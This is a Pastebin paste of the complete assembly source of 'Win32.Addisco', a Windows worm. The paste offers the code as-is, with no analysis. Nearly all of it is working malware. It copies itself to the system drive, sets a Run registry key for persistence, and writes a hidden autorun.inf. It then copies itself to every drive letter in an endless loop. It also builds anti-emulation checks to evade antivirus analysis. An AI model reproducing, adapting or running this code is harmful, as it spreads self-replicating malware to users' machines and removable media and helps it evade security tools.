Advertisement
FlyFar

Worm.Win32.Addisco - Source Code

Jul 3rd, 2023
1,650
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 15.65 KB | Cybersecurity | 0 0
  1. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  2. ;;
  3. ;;  Win32.Addisco
  4. ;;  by SPTH
  5. ;;  October 2011
  6. ;;
  7. ;;
  8. ;;  This is a worm which spreads via network/removable/USB drives.
  9. ;;
  10. ;;  The special thing is that it is able to find and implement
  11. ;;  new Anti-Emulation tricks autonomously.
  12. ;;
  13. ;;  This is done via analysing the undocumented leftover values in ECX
  14. ;;  and EDX after an random Windows API call. The API is analysed in
  15. ;;  a Black-Box test - if for a given set of parameters a constant
  16. ;;  ECX+EDX value is found, a new Anti-Emulation trick is created for
  17. ;;  the next generation.
  18. ;;
  19. ;;  The worm is aware of "Address Space Layout Randomization" (ASLR).
  20. ;;
  21. ;;  More details can be found in an article "Dynamic Anti-Emulation
  22. ;;  using Blackbox Analysis".
  23. ;;
  24. ;;  This analyse of the environment and autonomous developement of new
  25. ;;  self-defending trick seems to be a simple form of machine learning. :-)
  26. ;;
  27. ;;
  28. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  29.  
  30.  
  31.  
  32. include 'E:\Programme\FASM\INCLUDE\win32ax.inc'
  33.  
  34. .data
  35.     constFileSize  EQU 0x1000
  36.     constCodeStart EQU 0x0400
  37.  
  38.     hMyFileName dd 0x0
  39.     hFileHandle dd 0x0
  40.     hMapHandle  dd 0x0
  41.     hMapViewAddress dd 0x0
  42.  
  43.     hVEH       dd 0x0
  44.     bException dd 0x0
  45.     sESP       dd 0x0
  46.     s2ESP      dd 0x0
  47.  
  48.  
  49.     RandomNumber    dd 0x0
  50.     RandOrdinal dd 0x0
  51.  
  52.     RndFctAddress         dd 0x0
  53.     RndFctArguments       dd 0x0
  54.  
  55.     rept 0x10 c
  56.     {
  57.         RndFctArg#c dd 0x0
  58.     }
  59.  
  60.     RndFct_RV_ECX   dd 0x0
  61.     RndFct_RV_EDX   dd 0x0
  62.  
  63.  
  64.     kernel32    db "kernel32.dll",0x0
  65.     hKernel     dd 0x0
  66.     nOSVersion  dd 0x0
  67.  
  68.     SpaceForHDC:       dd 0x0   ; should be 0x0, C:\
  69.     RandomFileName: times 13 db 0x0
  70.  
  71.     SpaceForHDC2:      dd 0x0   ; should be 0x0, X:\
  72.     RandomFileName2:times 13 db 0x0
  73.  
  74.     stKey: times 47 db 0x0 ; "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0x0
  75.     hKey  dd 0x0
  76.  
  77.     stAutoRunContent: times 52 db 0x0
  78.  
  79.     stAutorunWithDrive db 0x0, 0x0, 0x0 ; "X:\"
  80.     stAutoruninf: times 12 db 0x0       ; "autorun.inf"
  81.  
  82.     hCreateFileAR        dd 0x0
  83.     hCreateFileMappingAR dd 0x0
  84.  
  85.  
  86.  
  87. macro VEH_TRY c*
  88. {
  89.     mov dword[sESP], esp
  90.  
  91.     push    VEH_Handler#c
  92.     push    0x1
  93.     stdcall dword[AddVectoredExceptionHandler]
  94.     mov dword[hVEH], eax
  95. }
  96.  
  97. macro VEH_EXCEPTION c*
  98. {
  99.     mov dword[bException], 0x0
  100.     jmp VEH_NoException#c
  101.  
  102.      VEH_Handler#c:
  103.     mov esp, dword[sESP]
  104.     mov dword[bException], 0x1
  105. }
  106.  
  107. macro VEH_END c*
  108. {
  109.      VEH_NoException#c:
  110.     mov eax, dword[hVEH]
  111.     push    eax
  112.     stdcall dword[RemoveVectoredExceptionHandler]
  113. }
  114.  
  115. .code
  116. start:
  117.     stdcall dword[GetVersion]
  118.     cmp eax, 0x0A280105     ; Version here
  119.     jne StartEngine     ; WrongVersion of OS
  120.  
  121.     push    kernel32
  122.     stdcall dword[LoadLibrary]
  123.  
  124.     add eax, 0x1234'5678
  125.  
  126.     times (0x10*5 + 2 + 6 + 2 + 1): nop  ; 0x10*push + call + cmp + je + ret
  127.  
  128.  
  129. ; ###########################################################################
  130. ; #####
  131. ; #####   Preparation (copy file, get kernel, ...)
  132. ; #####
  133.  
  134. StartEngine:
  135.     stdcall dword[GetVersion]
  136.     mov dword[nOSVersion], eax
  137.  
  138.     push    0x8007
  139.     stdcall dword[SetErrorMode]
  140.  
  141.     stdcall dword[GetCommandLineA]
  142.     mov dword[hMyFileName], eax
  143.     cmp byte[eax], '"'
  144.     jne FileNameIsFine
  145.     inc eax
  146.     mov dword[hMyFileName], eax
  147.  
  148.     FindFileNameLoop:
  149.         inc eax
  150.         cmp byte[eax], '"'
  151.     jne FindFileNameLoop
  152.  
  153.     mov byte[eax], 0x0
  154.     FileNameIsFine:
  155.  
  156.  
  157.     stdcall dword[GetTickCount]
  158.     mov dword[RandomNumber], eax
  159.  
  160.     xor esi, esi
  161.     CopyFileAndRegEntryMore:
  162.         mov ebx, 26
  163.         mov ecx, 97
  164.         call    CreateSpecialRndNumber
  165.  
  166.         mov byte[RandomFileName+esi], dl
  167.         inc esi
  168.         cmp esi, 8
  169.     jb  CopyFileAndRegEntryMore
  170.  
  171.     mov eax, ".exe"
  172.     mov dword[RandomFileName+esi], eax
  173.  
  174.     mov al, "C"
  175.     mov byte[SpaceForHDC+1], al
  176.     mov al, ":"
  177.     mov byte[SpaceForHDC+2], al
  178.     mov al, "\"
  179.     mov byte[SpaceForHDC+3], al
  180.  
  181.     push    FALSE
  182.     push    SpaceForHDC+1
  183.     push    dword[hMyFileName]
  184.     stdcall dword[CopyFileA]
  185.  
  186.     push    kernel32        ; Get Kernel32
  187.     stdcall dword[LoadLibrary]
  188.     cmp eax, 0
  189.     je  SpreadKitty
  190.  
  191.     mov dword[hKernel], eax
  192.  
  193.  
  194. ; #####
  195. ; #####   Preparation (copy file, get kernel, ...)
  196. ; #####
  197. ; ###########################################################################
  198.  
  199. ; ###########################################################################
  200. ; #####
  201. ; #####   call random API & save undocumented ECX&EDX
  202. ; #####
  203.  
  204.  
  205.    SearchRandomAPI:
  206.     call    GetRandomNumber
  207.     mov eax, dword[RandomNumber]
  208.     and eax, (0x40 - 1)
  209.     jz  SpreadKitty         ; Probabilistic quiting (1/64)
  210.  
  211.     call    GetRandomNumber
  212.     mov eax, dword[RandomNumber]
  213.     and eax, (0x400 - 1) ; 0-1023
  214.     mov dword[RandOrdinal], eax
  215.  
  216.     push    dword[RandOrdinal]
  217.     push    dword[hKernel]
  218.     stdcall dword[GetProcAddress]
  219.  
  220.     cmp eax, 0x0
  221.     je  SearchRandomAPI
  222.  
  223.     mov dword[RndFctAddress], eax
  224.  
  225.     mov dword[s2ESP], esp   ; Save original ESP
  226.     times 0x10: push 0      ; PUSH 16 parameters
  227.  
  228.  
  229.  
  230.     VEH_TRY FirstRun
  231. ;       {
  232.         stdcall dword[RndFctAddress]   ; try it ;)
  233. ;       }
  234.     VEH_EXCEPTION FirstRun
  235. ;       {                                       ; no success :-/
  236.            mov     esp, dword[s2ESP]    ; restore ESP
  237. ;       }
  238.     VEH_END FirstRun
  239.  
  240.     cmp dword[bException], 0x1
  241.     je  SearchRandomAPI
  242.  
  243.  
  244.     ; Get Number of arguments used by this random API :)
  245.     mov eax, esp
  246.     sub eax, dword[sESP]
  247.     shr eax, 2          ; eax/=4 -> number of arguments
  248.     mov dword[RndFctArguments], eax
  249.  
  250.     mov esp, dword[s2ESP]    ; restore ESP
  251.  
  252.  
  253.     call    RandomizeArguments
  254.     call    PushNArgumentsToStack
  255.  
  256.     VEH_TRY RealRun1
  257. ;       {
  258.         stdcall dword[RndFctAddress]
  259.  
  260.         mov dword[RndFct_RV_ECX], ecx
  261.         mov dword[RndFct_RV_EDX], edx
  262. ;       }
  263.     VEH_EXCEPTION RealRun1
  264. ;       {
  265.         mov esp, dword[s2ESP]    ; restore ESP
  266. ;       }
  267.     VEH_END RealRun1
  268.  
  269.     cmp dword[bException], 0x1
  270.     je  SearchRandomAPI
  271.  
  272.  
  273.     ; Run again and compare ECX and EDX, just in case (Time-APIs and stuff like that, dependence on register values)
  274.     call    PushNArgumentsToStack
  275.  
  276.     VEH_TRY RealRun2
  277. ;       {
  278.         call    RandomizeRegisters
  279.  
  280.         stdcall dword[RndFctAddress]
  281.  
  282.         sub ecx, dword[RndFct_RV_ECX]
  283.         jz  RealRun2ECX_OK
  284.  
  285.             xor eax, eax
  286.             mov dword[eax], 42
  287.  
  288.         RealRun2ECX_OK:
  289.         sub edx, dword[RndFct_RV_EDX]
  290.         jz  RealRun2EDX_OK
  291.  
  292.             xor eax, eax
  293.             mov dword[eax], 42
  294.  
  295.         RealRun2EDX_OK:
  296. ;       }
  297.     VEH_EXCEPTION RealRun2
  298. ;       {
  299.         mov esp, dword[s2ESP]    ; restore ESP
  300. ;       }
  301.     VEH_END RealRun2
  302.  
  303.     cmp dword[bException], 0x1
  304.     je  SearchRandomAPI
  305.  
  306.  
  307. ; #####
  308. ; #####   call random API & save undocumented ECX&EDX
  309. ; #####
  310. ; ###########################################################################
  311.  
  312. ; ###########################################################################
  313. ; #####
  314. ; #####   Open New File
  315. ; #####
  316.  
  317.     push    0x0
  318.     push    FILE_ATTRIBUTE_NORMAL
  319.     push    OPEN_ALWAYS
  320.     push    0x0
  321.     push    0x0
  322.     push    (GENERIC_READ or GENERIC_WRITE)
  323.     push    SpaceForHDC+1
  324.     stdcall dword[CreateFileA]
  325.  
  326.     cmp eax, INVALID_HANDLE_VALUE
  327.     je  IVF_NoCreateFile
  328.     mov dword[hFileHandle], eax
  329.  
  330.     push    0x0
  331.     push    constFileSize
  332.     push    0x0               ; nFileSizeHigh=0 from above
  333.     push    PAGE_READWRITE
  334.     push    0x0
  335.     push    dword[hFileHandle]
  336.     stdcall dword[CreateFileMappingA]
  337.  
  338.     cmp eax, 0x0
  339.     je  IVF_NoCreateMap
  340.     mov dword[hMapHandle], eax
  341.  
  342.     push    constFileSize
  343.     push    0x0
  344.     push    0x0
  345.     push    FILE_MAP_WRITE
  346.     push    dword[hMapHandle]
  347.     stdcall dword[MapViewOfFile]
  348.  
  349.     cmp eax, 0x0
  350.     je  IVF_NoMapView
  351.     mov dword[hMapViewAddress], eax
  352.  
  353. ; #####
  354. ; #####   Open New File
  355. ; #####
  356. ; ###########################################################################
  357.  
  358. ; ###########################################################################
  359. ; #####
  360. ; #####   Change Anti-Debugging API call at code start
  361. ; #####
  362.  
  363.     add eax, constCodeStart
  364.     mov ebx, dword[nOSVersion]
  365.     mov dword[eax + 0x07], ebx      ; write new OS
  366.  
  367.     mov ebx, dword[RndFctAddress]   ; Change "add eax, NNNN"
  368.     sub ebx, dword[hKernel]     ; where NNNN=Functionaddress-Kerneladdress
  369.     mov dword[eax + 0x19], ebx
  370.  
  371.     mov edi, RndFctArg1
  372.     mov esi, eax
  373.     add esi, 0x1D
  374.     mov ecx, dword[RndFctArguments]
  375.     jecxz   NoFurtherPush
  376.  
  377.    MoreArgPush:
  378.     add edi, 0x04
  379.     mov byte[esi], 0x68      ; push
  380.     mov ebx, dword[edi]
  381.     mov dword[esi + 0x01], ebx   ; argument
  382.     add esi, 0x05
  383.     dec ecx
  384.    jnz MoreArgPush
  385.  
  386.    NoFurtherPush:
  387.     mov word[esi], 0xD0FF       ; call
  388.     add esi, 0x2
  389.  
  390.     mov eax, dword[RndFct_RV_ECX]
  391.     and eax, 0xFF00'0000
  392.     mov ebx, dword[hKernel]
  393.     and ebx, 0xFF00'0000
  394.     cmp eax, ebx
  395.     je  NoECX_Kernel
  396.  
  397.     mov dword[esi], 0x0000'F981     ; cmp ecx, NNNN
  398.     add esi, 0x2
  399.  
  400.     mov ebx, dword[RndFct_RV_ECX]
  401.     mov dword[esi], ebx
  402.     add esi, 0x4            ; value of ECX
  403.  
  404.     mov dword[esi], 0x00C3'0174     ; je ... + ret
  405.     add esi, 0x3
  406.  
  407.    NoECX_Kernel:
  408.     mov eax, dword[RndFct_RV_EDX]
  409.     and eax, 0xFF00'0000
  410.     mov ebx, dword[hKernel]
  411.     and ebx, 0xFF00'0000
  412.     cmp eax, ebx
  413.     je  NoEDX_Kernel
  414.  
  415.     mov dword[esi], 0x0000'FA81     ; cmp ecx, NNNN
  416.     add esi, 0x2
  417.  
  418.     mov ebx, dword[RndFct_RV_EDX]
  419.     mov dword[esi], ebx
  420.     add esi, 0x4            ; value of EDX
  421.  
  422.     mov dword[esi], 0x00C3'0174     ; je ... + ret
  423.     add esi, 0x3
  424.    NoEDX_Kernel:
  425.  
  426.     mov ecx, constCodeStart+(StartEngine-start)
  427.     add ecx, dword[hMapViewAddress]
  428.  
  429.     PaddingTheHead:
  430.         mov byte[esi], 0x90
  431.         inc esi
  432.         cmp esi, ecx
  433.     jne PaddingTheHead
  434.  
  435.  
  436. ; #####
  437. ; #####   Change Anti-Debugging API call at code start
  438. ; #####
  439. ; ###########################################################################
  440.  
  441. ; ###########################################################################
  442. ; #####
  443. ; #####   Close New File
  444. ; #####
  445.  
  446.    IVF_CloseMapView:
  447.     push    dword[hMapViewAddress]
  448.     stdcall dword[UnmapViewOfFile]
  449.  
  450.    IVF_NoMapView:
  451.     push    dword[hMapHandle]
  452.     call    dword[CloseHandle]
  453.  
  454.    IVF_NoCreateMap:
  455.     push    dword[hFileHandle]
  456.     call    dword[CloseHandle]
  457.  
  458.    IVF_NoCreateFile:
  459.  
  460. ; #####
  461. ; #####   Close New File
  462. ; #####
  463. ; ###########################################################################
  464.  
  465.  
  466. ; ###########################################################################
  467. ; #####
  468. ; #####   Spread this kitty ;)
  469. ; #####
  470.  
  471. SpreadKitty:
  472. ;  Representation of "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
  473. ;  One could permute it - but too lazy for doing this task atm :)
  474.  
  475.     mov eax, stKey
  476.     mov dword[eax+0x00], "SOFT"
  477.     mov dword[eax+0x04], "WARE"
  478.     mov dword[eax+0x08], "\Mic"
  479.     mov dword[eax+0x0C], "roso"
  480.     mov dword[eax+0x10], "ft\W"
  481.     mov dword[eax+0x14], "indo"
  482.     mov dword[eax+0x18], "ws\C"
  483.     mov dword[eax+0x1C], "urre"
  484.     mov dword[eax+0x20], "ntVe"
  485.     mov dword[eax+0x24], "rsio"
  486.     mov dword[eax+0x28], "n\Ru"
  487.     mov byte[eax+0x2C], "n"
  488.  
  489.     push    0x0
  490.     push    hKey
  491.     push    0x0
  492.     push    KEY_ALL_ACCESS
  493.     push    REG_OPTION_NON_VOLATILE
  494.     push    0x0
  495.     push    0x0
  496.     push    stKey
  497.     push    HKEY_LOCAL_MACHINE
  498.     stdcall dword[RegCreateKeyExA]
  499.  
  500.     push    16
  501.     push    SpaceForHDC+1
  502.     push    REG_SZ
  503.     push    0x0
  504.     push    0x0
  505.     push    dword[hKey]
  506.     stdcall dword[RegSetValueExA]
  507.  
  508.     push    dword[hKey]
  509.     stdcall dword[RegCloseKey]
  510.  
  511.     xor eax, eax
  512.     mov dword[stAutorunWithDrive], "X:\a"
  513.     mov dword[stAutorunWithDrive+2], "\aut"
  514.     mov dword[stAutoruninf+3], "orun"
  515.     mov dword[stAutoruninf+7], ".inf"
  516.  
  517. ;        mov     eax, "[Aut"
  518.     mov dword[stAutoRunContent], "[Aut"
  519.     mov dword[stAutoRunContent+0x04], "orun"
  520.     mov dword[stAutoRunContent+0x08], 0x530A0D5D
  521.     mov dword[stAutoRunContent+0x0C], "hell"       ; !!!!!!!
  522.     mov dword[stAutoRunContent+0x10], "Exec"
  523.     mov dword[stAutoRunContent+0x14],  "ute="
  524.     mov eax, dword[RandomFileName]    ; Filename: XXXXxxxx.exe
  525.     mov dword[stAutoRunContent+0x18], eax
  526.     mov eax, dword[RandomFileName+0x4]    ; Filename: xxxxXXXX.exe
  527.     mov dword[stAutoRunContent+0x1C], eax
  528.     mov dword[stAutoRunContent+0x20], ".exe"
  529.     mov dword[stAutoRunContent+0x24], 0x73550A0D
  530.     mov dword[stAutoRunContent+0x28], "eAut"
  531.     mov dword[stAutoRunContent+0x2C], "opla"
  532.     mov dword[stAutoRunContent+0x30],  0x00313D79
  533.  
  534.     ; i like that coding style, roy g biv! :))
  535.     push    51
  536.     push    0x0
  537.     push    0x0
  538.     push    FILE_MAP_ALL_ACCESS
  539.     push    0x0
  540.     push    51
  541.     push    0x0
  542.     push    PAGE_READWRITE
  543.     push    0x0
  544.     push    0x0
  545.     push    FILE_ATTRIBUTE_HIDDEN
  546.     push    OPEN_ALWAYS
  547.     push    0x0
  548.     push    0x0
  549.     push    (GENERIC_READ or GENERIC_WRITE)
  550.     push    stAutoruninf
  551.  
  552.     stdcall dword[CreateFileA]
  553.     push    eax
  554.     mov dword[hCreateFileAR], eax
  555.     stdcall dword[CreateFileMappingA]
  556.     push    eax
  557.     mov dword[hCreateFileMappingAR], eax
  558.     stdcall dword[MapViewOfFile]
  559.  
  560.     xor cl, cl
  561.     mov esi, stAutoRunContent
  562.     MakeAutoRunInfoMore:
  563.         mov bl, byte[esi]
  564.         mov byte[eax], bl
  565.         inc eax
  566.         inc esi
  567.         inc ecx
  568.         cmp cl, 51
  569.     jb  MakeAutoRunInfoMore
  570.  
  571.     sub eax, 51
  572.     push    dword[hCreateFileAR]
  573.     push    dword[hCreateFileMappingAR]
  574.     push    eax
  575.     stdcall dword[UnmapViewOfFile]
  576.     stdcall dword[CloseHandle]
  577.     stdcall dword[CloseHandle]
  578.  
  579.     mov dword[SpaceForHDC2+1], "A:\."
  580.     mov eax, dword[RandomFileName]
  581.     mov dword[RandomFileName2], eax     ; XXXXxxxx.exe
  582.     mov eax, dword[RandomFileName+0x04]
  583.     mov dword[RandomFileName2+0x04], eax    ; xxxxXXXX.exe
  584.     mov eax, dword[RandomFileName+0x08]
  585.     mov dword[RandomFileName2+0x08], eax    ; .exe
  586.  
  587.  
  588.    SpreadKittyAnotherTime:
  589.     mov dword[SpaceForHDC2], 0x003A4100    ; 0x0, "A:", 0x0
  590.  
  591.    STKAnotherRound:
  592.     push    SpaceForHDC2+1
  593.     stdcall dword[GetDriveTypeA]
  594.  
  595.     xor ebx, ebx    ; 0 ... No Drive
  596.                 ; 1 ... Drive (without autorun.inf)
  597.                 ; 2 ... Drive (with autorun.inf)
  598.  
  599.     mov cl, '\'
  600.     mov byte[SpaceForHDC2+3],cl
  601.  
  602.  
  603. ;        mov     byte[DriveNumber], al
  604. ;        add     byte[DriveNumber], 0x30
  605.  
  606.     cmp al, 0x2
  607.     je  STKWithAutoRun
  608.  
  609.     cmp al, 0x3
  610.     je  STKWithoutAutoRun
  611.  
  612.     cmp al, 0x4
  613.     je  STKWithAutoRun
  614.  
  615.     cmp al, 0x6
  616.     je  STKWithAutoRun
  617.  
  618.     jmp STKCreateEntriesForNextDrive
  619.  
  620.     STKWithAutoRun:
  621.  
  622.     push    FALSE
  623.     push    stAutorunWithDrive
  624.     push    stAutoruninf
  625.     stdcall dword[CopyFileA]
  626.  
  627.     STKWithoutAutoRun:
  628.  
  629.     push    FALSE
  630.     push    SpaceForHDC2+1
  631.     push    SpaceForHDC+1
  632.     stdcall dword[CopyFileA]
  633.  
  634.  
  635.     STKCreateEntriesForNextDrive:
  636.     xor eax, eax
  637.     mov al, byte[SpaceForHDC2+1]
  638.     cmp al, "Z"
  639.     je  SpreadThisKittyEnd
  640.  
  641.     inc al
  642.     mov byte[SpaceForHDC2+1], al    ; next drive
  643.     mov byte[stAutorunWithDrive], al    ; next drive
  644.     mov byte[SpaceForHDC2+3], ah    ; 0x0, "X:", 0x0
  645.    jmp STKAnotherRound
  646.  
  647.  
  648.    SpreadThisKittyEnd:
  649.     call    GetRandomNumber
  650.     mov eax, dword[RandomNumber]
  651.     and eax, (0x8000 - 1)   ; 0-32 sec
  652.  
  653.     push    eax
  654.     stdcall dword[Sleep]
  655.  
  656.     call    GetRandomNumber
  657.     mov eax, dword[RandomNumber]
  658.     and eax, (0x100-1)
  659.     jnz SpreadKittyAnotherTime
  660.  
  661.     invoke  MessageBox, 0x0, "If you don't crack the shell, you can't eat the nut.", "Learning the joy of self-defence :-)", 0x0
  662.  
  663. jmp SpreadKittyAnotherTime
  664.  
  665. ; #####
  666. ; #####   Spread this kitty ;)
  667. ; #####
  668. ; ###########################################################################
  669.  
  670.  
  671. GetRandomNumber:
  672.     pushad
  673.         xor edx, edx
  674.         mov eax, dword[RandomNumber]
  675.  
  676.         mov ebx, 1103515245
  677.         mul ebx        ; EDX:EAX = EDX:EAX * EBX
  678.  
  679.         add eax, 12345
  680.         mov dword[RandomNumber], eax
  681.     popad
  682. ret
  683.  
  684. CreateSpecialRndNumber:
  685. ; in: ebx, ecx
  686. ; out: edx=(rand()%ebx + ecx)
  687.  
  688.         call    GetRandomNumber
  689.  
  690.         xor edx, edx
  691.         mov eax, dword[RandomNumber]
  692.         div ebx
  693.  
  694.         add edx, ecx
  695. ret
  696.  
  697. RandomizeArguments:
  698.     pushad
  699.         mov ecx, 0x10
  700.         mov edi, RndFctArg1
  701.         CreateArgLoop:
  702.             call    GetRandomNumber
  703.             mov eax, dword[RandomNumber]
  704.             mov dword[edi], eax
  705.             add edi, 4
  706.             dec ecx
  707.         jnz CreateArgLoop
  708.     popad
  709.  
  710. ret
  711.  
  712.  
  713. RandomizeRegisters:
  714.     call    GetRandomNumber
  715.     mov ecx, dword[RandomNumber]    ; Randomize ECX
  716.     call    GetRandomNumber
  717.     mov edx, dword[RandomNumber]    ; Randomize EDX
  718.     call    GetRandomNumber
  719.     mov eax, dword[RandomNumber]    ; Randomize EAX (in case of some "xchg ecx|edx, Reg32")
  720.     call    GetRandomNumber
  721.     mov ebx, dword[RandomNumber]    ; Randomize EBX (in case of some "xchg ecx|edx, Reg32")
  722.     call    GetRandomNumber         ; prevent the output to depent on the input registers :)
  723. ret                     ; dont care about esi, edi, ebx. worst case -> no execution
  724.  
  725.  
  726.  
  727. PushNArgumentsToStack:
  728.     pop ebx        ; return value
  729.     mov ecx, dword[RndFctArguments]
  730.     cmp ecx, 0
  731.     je  PushNArgumentsToStackFin
  732.  
  733.     mov edi, RndFctArg1
  734.     PushArgs:
  735.         push    dword[edi]
  736.         add edi, 4
  737.         dec ecx
  738.     jnz PushArgs
  739.  
  740.  PushNArgumentsToStackFin:
  741.     push    ebx
  742. ret
  743.  
  744. .end start
Tags: asm usb worm
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement